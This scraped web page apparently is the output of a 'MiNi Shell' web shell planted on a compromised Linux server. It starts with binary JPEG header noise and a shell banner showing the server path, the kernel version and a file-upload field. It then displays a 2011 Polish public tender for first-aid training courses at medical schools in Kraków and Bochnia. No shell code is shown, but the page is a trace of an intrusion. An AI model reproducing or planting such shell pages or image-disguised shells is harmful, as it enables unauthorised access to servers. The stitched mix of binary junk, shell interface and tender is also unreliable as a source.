JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111103/362048-N-2011.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji i przeprowadzenia kursów z zakresu udzielania pierwszej pomocy w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 362048 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 6442872, 501642173, faks 12 6449997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sppsmis3.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji i przeprowadzenia kursów z zakresu udzielania pierwszej pomocy w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/. Przedmiotem niniejszego postępowania jest zorganizowanie                         i przeprowadzenie kursów  z zakresu udzielania pierwszej pomocy                    w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w:
Część I : Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków
Część II:  Szkole Policealnej Pracowników Służb Medycznych        i Społecznych w Bochni, ul. Regis 2, 32-700 Bochnia
2/. Krakowska Medyczna Szkoła Policealna Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków
Czas trwania kursu:  6 godzin teoretycznych i 2 godziny praktyczne (przez 1 godz. rozumiemy godz. lekcyjną 45 minut ).
Liczba uczestników kursu: jedna grupa 10 osobowa. Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy
3/. Szkoła Policealna Pracowników Służb Medycznych i Społecznych w Bochni, ul. Regis 2, 32-700 Bochnia
Czas trwania kursu:. 20 godzin łącznie. Kurs może trwać maksymalnie 8 godz. w jednym dniu zajęciowym. Wykonawca zobowiązany jest do zaplanowania jednej 30 min przerwy. Zajęcia muszą być prowadzone w dni wolne od nauki.
Liczba uczestników kursu: 10 osób..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami, zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują co najmniej po jednej osobie dla :
części I posiadającej wykształcenie pozwalające na prowadzenie szkoleń z pierwszej pomocy zgodne z aktualnie obowiązującą ustawą               o Państwowym Ratownictwie Medycznym. Osoba to musi posiadać doświadczenie ogólne w zakresie prowadzenia szkoleń z pierwszej pomocy i przeszkoliła co najmniej 500 osób w ciągu ostatnich 2 lat, 
w części II posiadającej wykształcenie pozwalające na prowadzenie szkoleń z pierwszej pomocy zgodne z aktualnie obowiązującą ustawą               o Państwowym Ratownictwie Medycznym. Osoba ta musi posiadać co najmniej 3 letnie doświadczenie zawodowe (ratownik medyczny, pielęgniarka systemu ratownictwa medycznego, lekarz systemu ratownictwa medycznego) i należeć do czynnego zawodowo personelu medycznego pogotowia ratunkowego lub szpitalnego oddziału ratunkoweg</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program(opis) kursu odpowiednio dla danej części</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy 2/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sppsmis3.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 12:00, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu pierwszej pomocy w Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krakowska Medyczna Szkoła Policealna Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków

1/. Przedmiotem części pierwszej postępowania jest zorganizowanie kursu pierwszej pomocy dla uczniów kształcących się w zawodach: technik dentystyczny oraz higienistka stomatologiczna w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.

2/. Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:


Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji kursu (wykładowców zajęć praktycznych             i trenerów zajęć ćwiczeniowych), koszt wyposażenia specjalistycznego koniecznego do przeprowadzenia ww. kursu, koszt materiałów szkoleniowych dla każdego uczestnika kursu. 

3/. Do obowiązków Wykonawcy należy przede wszystkim:
a.	zapewnienie dostępu do odpowiedniego sprzętu oraz materiałów dydaktycznych takich jak  niezbędne, skrypty, notatniki, długopisy przechodzące na własność kursantów itp.,
b.	realizacja kursu przez wykwalifikowaną kadrę, posiadającą uprawnienia i doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową, 
W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
3/. Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,
b.	program kursu oraz dziennik zajęć,
c.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
d.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem

Zaświadczenia o uczestnictwie w danym kursie wystawi Zamawiający.

4/. Ramowy program kursu: program szkolenia musi obejmować 6 godzin teoretycznych i 2 godziny praktyczne kursu dla każdego uczestnika.

Kurs musi się odbywać w oparciu o opracowany przez prowadzącego PROGRAM KURSU, załączony do oferty, OBEJMUJĄCY MIĘDZY INNYMI NIŻEJ WYMIENIONE ZAGADNIENIA:

Część teoretyczna:
a/.Zasady bezpieczeństwa, aspekty psychologiczne związane z niesieniem pomocy - usystematyzowanie zagrożeń panujących w gabinecie stomatologicznym,
b/.Profilaktyka zakażeń podczas działań ratunkowych,
c/.Organizacja i wzywanie pogotowia ratunkowego,
d/.Ocena funkcji życiowych- podejście do poszkodowanego,
e/.Postępowanie z pacjentem nieprzytomnym - również z wykorzystaniem fotela dentystycznego i pozycji ratunkowej,
f/.Algorytm działania BLS (Basic Life Support),
g/.Resuscytacja dorosłych i dzieci - CPR (Cardio-Pulmonary Resuscitation),
h/.Użycie automatycznego defibrylatora - AED (Automated External Defibrillation),
i/.Postępowanie we wstrząsie anafilaktycznym i hipowolemicznym, ze szczególnym uwzględnieniem zagrożeń w gabinecie dentystycznym,
j/.Zapewnienie poszkodowanemu komfortu termicznego,
k/.Skuteczna reakcja na masywne krwotoki, współczesne sposoby tamowania i opatrywania ze szczególnym uwzględnieniem urazów, które mogą powstać w trakcie zabiegów stomatologicznych,
l/.Postępowanie w urazach kończyn, głowy (szczególnie twarzoczaszki), klatki piersiowej,
ł/.Ewakuacja z miejsca zdarzenia - przeniesienie pacjenta z fotela dentystycznego,
m/.Kompletowanie apteczki pierwszej pomocy dla gabinetu stomatologicznego,
n/.Planowanie akcji,
o/.Zadania problemowe.
        
Część praktyczna:

Ćwiczenia udzielania pomocy w symulowanych zdarzeniach.

5/.Czas trwania kursu:  6 godzin teoretycznych i 2 godziny praktyczne (przez 1 godz. rozumiemy godz. lekcyjną 45 minut ).
6/.Liczba uczestników kursu: jedna grupa 10 osobowa. Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy
7/.Czas realizacji: do 15 grudnia 2011 r.

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 
8/.Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. Umowa będzie realizowana w Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58. Zamawiający udostępnia bezpłatnie sale wykładowe, w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu pierwszej pomocy w  Szkole Policealnej Pracowników Służb Medycznych i Społecznych w Bochni, ul. Regis 2, 32-700 Bochnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoła Policealna Pracowników Służb Medycznych i Społecznych w Bochni, ul. Regis 2, 32-700 Bochnia

1/. Przedmiotem zamówienia jest zorganizowanie kursu udzielania pierwszej pomocy dla grupy 10 osób w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.  

2/. Szczegółowe wymagania związane z realizacja przedmiotu zamówienia: 

Przedmiotem zamówienia jest organizacja i realizacja kursu udzielania pierwszej pomocy dla grupy 10 osób.
Wykonawca zobowiązany jest zapewnić materiały szkoleniowe dla każdego uczestnika kursu oraz inne materiały i pomoce dydaktyczne niezbędne do zrealizowania kursu (środki opatrunkowe - materiały te nie stanowią własności kursantów, skrypt szkoleniowy - na własność kursanta).

3/.Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest pokryć koszty organizacji kursu (wykładowców zajęć praktycznych             i trenerów zajęć ćwiczeniowych), koszt wyposażenia specjalistycznego, sprzętu koniecznego do przeprowadzenia ww. kursów, na szkoleniu musi być wykorzystany specjalistyczny sprzęt taki jak:
a.	manekiny osób dorosłych - model Little Anne (po 1 na każdą 5 osobową grupę ćwiczeniową). Przynajmniej jeden z manekinów to Resusci Anne Skillreporter z podłączeniem do komputera (jest on niezbędny do wiarygodnego przeprowadzenia egzaminu i oceny wystawionej uczestnikowi szkolenia),
b.	manekin dziecka (Little junior) i manekin niemowlęcia (Baby Anne) (po 1 na każdą grupę ćwiczeniową),
c.	urządzenia AED Philips HeartStart FRx z opcją ćwiczebną (po 1 na każdą 5-osobową grupę ćwiczeniową),
d.	środki opatrunkowe w ilości pozwalającej na jednoczesną realizację ćwiczeń przez wszystkich uczestników,
e.	inne specjalistyczne środki potrzebne do realizacji szkolenia według uznania Zamawiającego.
oraz koszt materiałów szkoleniowych dla każdego uczestnika kursu( skrypt). 
4/.Do obowiązków Wykonawcy należy przede wszystkim:
a.	zapewnienie dostępu do odpowiedniego sprzętu, Wykonawca dostarcza fantomy oraz środki opatrunkowe, (materiały te nie stanowią własności kursantów) oraz materiałów dydaktycznych (szkoleniowych- skrypt),
b.	realizacja kursu przez wykwalifikowaną kadrę, posiadającą uprawnienia i doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową. 
5/.W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
6/.Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu szkolenia,
b.	program kursu oraz dziennik zajęć,
c.	protokół z egzaminu wewnętrznego jeżeli był przeprowadzany,
d.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
e.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem. 

Zaświadczenia o uczestnictwie w danym kursie wystawi Zamawiający.

7/.Ramowy program kursu:
Program kursu obejmuje:  20 godzin zajęć teoretyczno-ćwiczeniowych, przy czym przez 1 godzinę trwania kursu Zamawiający rozumie 45 minut. Część teoretyczna 15 godz. Część praktyczna 5 godz.  


Kurs musi się odbywać w oparciu o opracowany przez prowadzącego PROGRAM KURSU, załączony do oferty, obejmujący niżej wymienione zagadnienia.

Część teoretyczna:
a/.Zasady bezpieczeństwa, aspekty prawne, psychologiczne związane z niesieniem pomocy - specyfika zagrożeń podczas pracy technika masażysty,
b/.Bezpieczeństwo własne, poszkodowanego, miejsca zdarzenia,
c/.Organizacja i wzywanie pogotowia,
d/.Zestawy ratownicze, dezynfekcja sprzętu,
e/.Ocena funkcji życiowych,
f/.Poszkodowany nieprzytomny,
g/.Algorytm działania BLS (Basic Life Support),
h/.Resuscytacja dorosłych i dzieci - CPR (Cardio-Pulmonary Resuscitation), 
i/.Defibrylator zautomatyzowany, zasady defibrylacji poszkodowanego metodą półautomatyczną i automatyczną,
j/.Postępowanie we wstrząsie,
k/.Inne stany nagłe - drgawki, cukrzyca, zawał mięśnia sercowego, udar mózgu, zatrucia,
l/.Urazy mechaniczne i obrażenia - złamania, zwichnięcia, skręcenia, krwotoki, obrażenia klatki piersiowej, brzucha, kręgosłupa, głowy i kończyn,
ł/.Ewakuacja z miejsca zdarzenia - szczególnie przeniesienia pacjenta ze stołu, maty do masażu, 
m/.Zapewnienie pacjentowi komfortu termicznego, 
n/.Kompletowanie apteczki pierwszej pomocy dla gabinetu masażu,
o/.Planowanie akcji, 
p/.Zadania problemowe. 

Część praktyczna:
Ćwiczenia udzielania pomocy w symulowanych zdarzeniach. 

8/.Czas trwania kursu:. 20 godzin łącznie. Kurs może trwać maksymalnie 8 godz. w jednym dniu zajęciowym. Wykonawca zobowiązany jest do zaplanowania jednej 30 min przerwy. Zajęcia muszą być prowadzone w dni wolne od nauki.
9/.Liczba uczestników kursu: 10 osób.
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.
10/.Czas realizacji: 15 grudnia 2011r.

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego- Liderem Szkolnym po podpisaniu umowy.
11/.Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. Umowa będzie realizowana w Szkole Policealnej Pracowników Służb Medycznych i Społecznych w Bochni. Zamawiający udostępnia bezpłatnie sale wykładowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
